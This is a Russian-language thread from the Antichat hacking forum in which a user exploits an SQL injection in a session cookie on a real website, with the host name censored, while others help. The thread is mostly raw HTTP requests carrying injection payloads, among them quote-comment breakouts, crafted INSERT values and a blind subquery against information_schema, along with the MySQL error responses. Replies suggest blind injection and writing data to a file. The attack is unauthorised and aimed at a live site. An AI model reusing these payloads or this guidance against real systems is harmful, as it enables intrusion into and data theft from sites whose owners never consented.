Форум АНТИЧАТ - Вопрос по sql-inj в кукисах

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Вопрос по sql-inj в кукисах (https://forum.antichat.xyz/showthread.php?t=56467)

Вопрос по sql-inj в кукисах

Нашёл скул на сайте в куках. подставляем ковычку - выдает ошибку. Пробую раскрутить, а сервер каким-то макаром по-разному отвечает на изменения в запросе...Например, получается так:

Первый запрос

Код:

GET http://<ЦЕНЗУРА>/ HTTP/1.0

Accept: */*

Accept-Language: ru

Host: <ЦЕНЗУРА>

Pragma: no-cache

Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12'/*



error near чета-там...

INSERT INTO online (uid, par2, lastdate, location, useragent, ip, proxy ) VALUES(0, 'n0u21994ig02q51f6ka36vgk12' and 1=0/*', 1198519416, '%mainpage%', '', '85.214.66.61', '85.214.66.61')

Соответственно, я пытаюсь собственноручно заполнить INSERT и получается вот что:

Код:

GET http://<ЦЕНЗУРА>/ HTTP/1.0

Accept: */*

Accept-Language: ru

Host: <ЦЕНЗУРА>

Pragma: no-cache

Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '' , '1.1.1.1', '1.1.1.1')/*



error near чета-там...

SELECT COUNT(*) as count FROM online WHERE par2='n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '' , '1.1.1.1', '1.1.1.1')/*[/

Так и получается, что я пытаюсь сделать правильный на мой взгляд запрос, а сервес сцуко, каким-то макаром меняет ответ когда не надо >:0

В чем проблема?

По моему дело в пробелах. В запросах пробелы надо урлэнкодить. Попробуй их просто избежать :)

Macro, хм..счас попробую...
А пока вот эти 2 запроса меня больше всего настораживают =)

Код:

GET http://<censored>/ HTTP/1.0

Accept: */*

Accept-Language: ru

User-Agent: 123

Host: <censored>

Pragma: no-cache

Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12'/*, 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*



You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')/*, 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*'' at line 1

Error Number:1064

INSERT INTO online (uid, session, lastdate, location, useragent, ip, proxy ) VALUES(0, 'n0u21994ig02q51f6ka36vgk12'/*, 1198519416, '%mainpage%', 'm' , '1.1.1.1', '1.1.1.1')/*', 1198521938, '%mainpage%', '123', '128.197.11.30', '128.197.11.30')









GET http://<censored>/ HTTP/1.0

Accept: */*

Accept-Language: ru

User-Agent: 123

Host: <censored>

Pragma: no-cache

Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*



You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*'' at line 1

Error Number:1064

SELECT COUNT(*) as count FROM online WHERE session='n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*

ну а что тут непонятно?

есть два запроса, один INSERT другой SELECT
есть переменная par2, которая используется в первом и во втором запросе
второй твой пример показывает, что первый запрос прошел успешно
т.к. после подстановки твоих значений из par2 в INSERT они корректные именно для INSERT, но не для SELECT, второй запрос выдает ошибку... у меня сейчас башка не варит, но я думаю, что из запроса SELECT ты ничего вынешь (не получится) т.к. сначала идет INSERT и в случае неккоректности выкидывает ошибку, и данные из par2 в SELECT не поступают, почитай статью Elekt`a там написано про BLIND-inj, может получится что нить из этого получить

Macro,дело не в пробелах :(
Вот ещё, что заметил...par2-это сессия. После того, как мне на сайте "завели" сессию, то пока она жива, корректно выполняется запрос:

Код:



GET http://<CENSORED>/ HTTP/1.0

Accept: */*

Accept-Language: ru

User-Agent: m

Host: <CENSORED>

Pragma: no-cache

Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=rih9c1888t9kormjhuvsf537d4' or 1=(select 1 from information_schema.tables limit 1 offset 1)/*

Как сессия "умирает", запрос становится некорректен. Кроме блайнда что-нибудь здесь светит? Ещё пробвал вывести данные в файл, но папку на запись не нашёл :(

Кстати, скобка в этом запросе лишняя

Цитата:

GET http://<censored>/ HTTP/1.0
Accept: */*
Accept-Language: ru
User-Agent: 123
Host: <censored>
Pragma: no-cache
Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*'' at line 1
Error Number:1064
SELECT COUNT(*) as count FROM online WHERE session='n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1')/*

Надо

Код:

GET http://<censored>/ HTTP/1.0

Accept: */*

Accept-Language: ru

User-Agent: 123

Host: <censored>

Pragma: no-cache

Cookie: par1=i3p60aq8vi58aotontiekgvdr4; par2=n0u21994ig02q51f6ka36vgk12', 1198519416, '%mainpage%', '123' , '1.1.1.1', '1.1.1.1'/*

Macro, она была бы верно поставлена, если б сервер ответил так, как я ожидал :)

Цитата:

Сообщение от AFoST

Macro, она была бы верно поставлена, если б сервер ответил так, как я ожидал :)

Совет #1 Никогда ничего не предвосхищай :)
А вообще, так тут тебе вряд ли сильно помогут, линк в студию или пиши кому-нить знакомому в пм.

скобка нужна для Insert

Macro, хост не хочу палить, там ресурс полезный =)